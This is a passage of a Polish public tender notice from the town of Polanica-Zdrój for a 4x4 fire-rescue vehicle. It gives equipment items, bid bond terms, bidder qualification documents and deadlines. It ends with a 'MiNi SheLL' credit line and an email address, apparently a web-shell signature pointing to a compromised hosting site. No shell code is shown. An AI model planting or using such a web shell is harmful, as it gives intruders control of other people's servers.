3.20.5.	zbiornik paliwa o pojemności nie mniejszej niż 2 l.
3.20.6.	masa całkowita nie większa niż 30 kg.
Sprzęt oświetleniowy, sygnalizacyjny i łączności.
3.21.	Agregat prądotwórczy min. 3,5 kVA (50Hz, IP - 54, 230V, 400V)	1 szt.
3.22.	Maszt oświetleniowy zamontowany na stałe w samochodzie,
   wysuwany pneumatycznie, z najaśnicami halogenowymi
   min 2 x 1000 W. Podłączony do agregatu prądotwórczego. 
   Zabezpieczenie masztu przed samoczynnym wysuwaniem
   w czasie jazdy po nierównej nawierzchni oraz sygnalizacją
  świetlną w kabinie kierowcy informującą o wysuniętym maszcie	          1 kpl. 
3.23.	Statywy do zawieszania taśmy odgradzającej z podstawkami	        10 kpl.
3.24.	Taśma do odgradzania miejsca akcji z folii biało-czerwonej
    o długości 500 m.							2 szt.
Sprzęt pozostały.
3.25.	Miotła kokosowa z trzonkiem						1 szt.
3.26.	Kanistry na paliwo 5 1.							2 szt.
3.27.	Kliny pod koła								2 szt.
3.28.	Zakrycie na studzienki							1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Każdy wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości 24 000,00 PLN , słownie: dwadzieścia cztery tysiące złotych.  Wykonawca wnosi wadium w jednej lub kilku z form określonych w art. 45 ust. Ustawy PZP . W razie wpłaty  na konto zamawiającego nr BZ WBK S.A. 1 Oddział  w Polanicy-Zdroju  57 1090 2327 0000 0001 0721 9483  należy użyć dopisku ; Zakup1 szt. średniego samochodu Ratowniczo - Gaśniczego GBA z napędem terenowym 4x4  dla Jednostki Ochotniczej Straży Pożarnej w Polanicy-Zdroju
Dla poniżej podanych form :
1) poręczeń lub gwarancji bankowych ;
2) gwarancji ubezpieczeniowych;
3) poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2  
    ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju 
    Przedsiębiorczości 
4) poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo - 
    kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
5) gwarancji bankowych;
przekazanych Skarbnikowi Gminy Polanica-Zdrój  w siedzibie zamawiającego pokój nr 16 (sekretariat) , przed upływem terminu składania ofert -- kserokopia tego dokumentu powinna być dołączona do oferty. 
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji  
    (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej   
    udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
Dokument w formie poręczenia winien zawierać stwierdzenie , że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium zgodnie z warunkami przetargu , następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń. Wadium , złożone przez wykonawcę , który wygra przetarg , zostanie mu zwrócone po zawarciu umowy oraz złożeniu wymaganego zabezpieczenia należytego wykonania umowy. Wykonawcom , którzy nie wygrali przetargu , wadium zostanie zwrócone niezwłocznie po otrzymaniu żądanego zabezpieczenia należytego wykonania umowy i zawarciu ważnej umowy z wykonawcą , który wygrał przetarg , ale nie później niż w dniu wygaśnięcia okresu ważności oferty.
Zamawiający zatrzymuje wadium w przypadkach, gdy wykonawca, którego oferta została wybrana :
a/ odmówił podpisania umowy w sprawie zamówienia publicznego za warunkach   
określonych w ofercie;
b/  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
c/  zawarcie umowy w sprawie zamówienia publicznego stało się nie możliwe z 
przyczyn leżących po stronie wykonawcy. 
W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie Kwoty wadium na poczet zabezpieczenia. Zgoda taka winna zostać złożona Zamawiającemu na piśmie przed podpisaniem umowy sprawie zamówienia publicznego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Wykonawcy ubiegający sie o zamówienie publiczne powinni posiadać zarejestrowaną działalność w zakresie obejmującym przedmiot zamówienia .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłożenie wykazu wykonanych, dostaw lub usług w zakresie niezbędnym do udowodnienia  spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy / w tym okresie/  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów, oraz załączeniem dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie ;  Zamawiający uzna warunek za spełniony gdy Wykonawca wykaże realizację co najmniej 2 dostaw odpowiadających swoim rodzajem . średniemu samochodowi gaśniczemu wraz z wyposażeniem o wartości min. 750.000 PLN tj.  podanie wartości, okresu realizacji, odbiorców wraz z dokumentami potwierdzającymi, że dostawy wyszczególnione w wykazie zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedstawienie wykazu urządzeń  i wyposażenia niezbędnych do wykonania przedmiotu  zamówienia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedstawienie wykazu  osób bezpośrednio wykonujących przedmiot umowy które muszą posiadać stosowne  uprawnienia , świadectwa kwalifikacji zawodowych, odpowiednich do zajęć wykonywanych w ramach zamówienia , osób kadry zarządzającej posiadającej  odpowiednie wykształcenie zawodowe i doświadczenie związane z realizacją zamówienia .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie środków finansowych lub zdolność kredytowej w wysokości min. 750.000 PLN ; posiadanie polisy ubezpieczeniowej w wys. min. 750.000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.polanica.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.polanica.pl/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2010 godzina 09:30, miejsce: Urząd Miejski  w Polanicy-Zdroju , 57-320 Polanica-Zdrój  ul. Jarosława Dąbrowskiego 3 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com